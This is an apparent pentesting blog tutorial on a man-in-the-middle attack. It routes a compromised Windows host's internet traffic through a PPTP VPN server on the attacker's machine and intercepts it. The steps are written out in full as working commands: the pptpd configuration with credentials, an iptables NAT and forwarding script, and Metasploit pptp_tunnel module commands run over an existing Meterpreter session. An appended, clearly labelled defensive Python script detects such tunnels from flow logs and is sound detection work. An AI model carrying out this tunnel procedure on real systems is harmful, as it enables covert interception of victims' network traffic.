Tunneling Techniques with tun/tap interfaces - Metasploit: PPTP tunnel (MITM - share internet with a compromised internal host), ligolo-ng, easy-openvpn-server
Hi, here we will see how we can perform a Man in the Middle (MITM) attack on a compromised remote Windows machine by routing its internet traffic through a PPTP VPN server on our attacking system.
Prerequisites: a Meterpreter session on the compromised host. List the available sessions with:
sessions -l
Steps:
1. Installing the VPN server:
I have already installed it. You can install it by running the command given below.
apt install pptpd -y
2. Configuring the VPN server:
a) Edit the file /etc/pptpd.conf and add these lines at the end.
localip 192.169.0.1
remoteip 192.169.0.234-238
Basically, here we define the server's own address on the VPN (localip) and the range of addresses handed out to VPN clients (remoteip).
b) Edit the file /etc/ppp/chap-secrets and add this line at the end.
root * testertest *
Here we define the credentials the client uses to authenticate to the VPN server. The four fields are the client (user) name, the server name (* matches any), the secret, and the client IP addresses allowed (* matches any).
3. Starting the VPN server:
systemctl start pptpd
systemctl status pptpd
We can also confirm that it is listening with netstat.
netstat -lntp
The PPTP server listens on TCP port 1723 by default.
4. Create and run this bash script:
Save it as pptpd_server.sh and replace eth1 with the interface your attacking system uses for its internet connection.
#!/bin/bash
/etc/init.d/pptpd restart && netstat -putan | grep 1723
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -A FORWARD -i ppp0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
route -n  # eth1 is the interface with internet access on the attacker system
Then make the script executable and run it.
chmod +x pptpd_server.sh
./pptpd_server.sh
I didn't understand this completely (maybe you can help me understand it in the comments 😅), but here:
a) In line no. 2 we restart the pptpd daemon, then run netstat and filter its output to show only lines containing the string 1723, i.e. confirm the server is listening again.
b) In line no. 3 the MASQUERADE rule source-NATs packets leaving eth1, so traffic coming from VPN clients on ppp0 goes out with the attacker system's own address. Lines no. 4 and 5 allow forwarding from ppp0 to eth1 and allow only the matching return traffic (ESTABLISHED,RELATED) back from eth1 to ppp0.
c) In line no. 6 we enable packet forwarding in the kernel.
d) In line no. 7 we print the routing table.
5. Connecting to the VPN server (from the compromised host):
msf6 > use windows/manage/pptp_tunnel
msf6 post(windows/manage/pptp_tunnel) > set username root
username => root
msf6 post(windows/manage/pptp_tunnel) > set password testertest
password => testertest
msf6 post(windows/manage/pptp_tunnel) > set vpnhost 192.168.70.45
vpnhost => 192.168.70.45
msf6 post(windows/manage/pptp_tunnel) > set session 2
session => 2
msf6 post(windows/manage/pptp_tunnel) > run
6. Testing the MITM:
a) From the compromised host, ping Google's DNS server (8.8.8.8) and, at the same time, run Wireshark (choose the ppp0 interface) to see whether the MITM is working.
Note: Remember to run Wireshark on the attacker system and capture traffic on the PPTP VPN's interface.
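From the defender's side, the whole procedure above leaves a very recognisable footprint: the compromised host first opens a TCP connection to port 1723 (the PPTP control channel) and then starts sending GRE (IP protocol 47) to the same peer, after which its internet traffic leaves through that peer instead of the normal gateway. The following script is an added example, not part of the original post, that runs this correlation over firewall or flow-log lines. The flow records, the allowlist of approved PPTP concentrators and the log format are all constructed for the example (the 192.168.70.45 peer address is the VPN server address used in the walkthrough).

```python
"""Flow-log detection for PPTP tunnel establishment (added example).

A PPTP tunnel always starts with a TCP connection to port 1723 (the control
channel) and then carries the actual traffic in GRE (IP protocol 47) to the
same peer. Seeing both from a workstation to an unapproved peer is a strong
signal that the host's traffic is being routed through a foreign VPN server.
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed sample records (not real traffic): timestamp src dst proto dport.
# Host 10.10.5.23 builds a full PPTP tunnel to 192.168.70.45 (the VPN server
# address from the walkthrough); 10.10.5.41 only opens the control channel.
SAMPLE_FLOWS = """\
2024-05-01T10:00:01 10.10.5.23 10.10.5.1 UDP 53
2024-05-01T10:00:05 10.10.5.23 192.168.70.45 TCP 1723
2024-05-01T10:00:06 10.10.5.23 192.168.70.45 GRE 0
2024-05-01T10:00:09 10.10.5.23 8.8.8.8 ICMP 0
2024-05-01T10:01:00 10.10.5.40 203.0.113.10 TCP 443
2024-05-01T10:02:00 10.10.5.41 203.0.113.99 TCP 1723
"""

# Hypothetical allowlist of sanctioned PPTP concentrators (assumption).
APPROVED_PPTP_PEERS = {"198.51.100.7"}
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]


@dataclass(frozen=True)
class Flow:
    ts: str
    src: str
    dst: str
    proto: str
    dport: int


def parse_flows(text):
    """Parse whitespace-separated flow lines; blank lines are skipped."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, proto, dport = line.split()
        flows.append(Flow(ts, src, dst, proto.upper(), int(dport)))
    return flows


def is_internal(addr):
    """True when the address falls inside one of the RFC 1918 ranges."""
    ip = ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def detect_pptp(flows):
    """Return one alert dict per (src, peer) pair that opened a PPTP control channel.

    Severity is 'high' when GRE to the same peer was also seen (the tunnel is
    carrying traffic) and 'medium' for a control-channel attempt alone.
    """
    control = defaultdict(list)   # (src, dst) -> timestamps of TCP/1723
    gre = defaultdict(list)       # (src, dst) -> timestamps of GRE
    for f in flows:
        if f.proto == "TCP" and f.dport == 1723:
            control[(f.src, f.dst)].append(f.ts)
        elif f.proto == "GRE":
            gre[(f.src, f.dst)].append(f.ts)

    alerts = []
    for (src, dst) in sorted(control):
        if dst in APPROVED_PPTP_PEERS:
            continue                      # sanctioned concentrator, ignore
        tunnel_up = (src, dst) in gre
        alerts.append({
            "src": src,
            "peer": dst,
            "peer_internal": is_internal(dst),   # peer inside our own ranges is odd for a VPN server
            "severity": "high" if tunnel_up else "medium",
            "first_seen": min(control[(src, dst)]),
            "gre_seen": tunnel_up,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_pptp(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

Because the control channel and the GRE data both go to the same peer, the correlation is cheap and has few false positives once sanctioned concentrators are allowlisted; the same two facts (TCP/1723 and protocol 47) are also what an egress filter needs to block this tunnel at the perimeter or in the host firewall.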
Thanks for reading!
Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)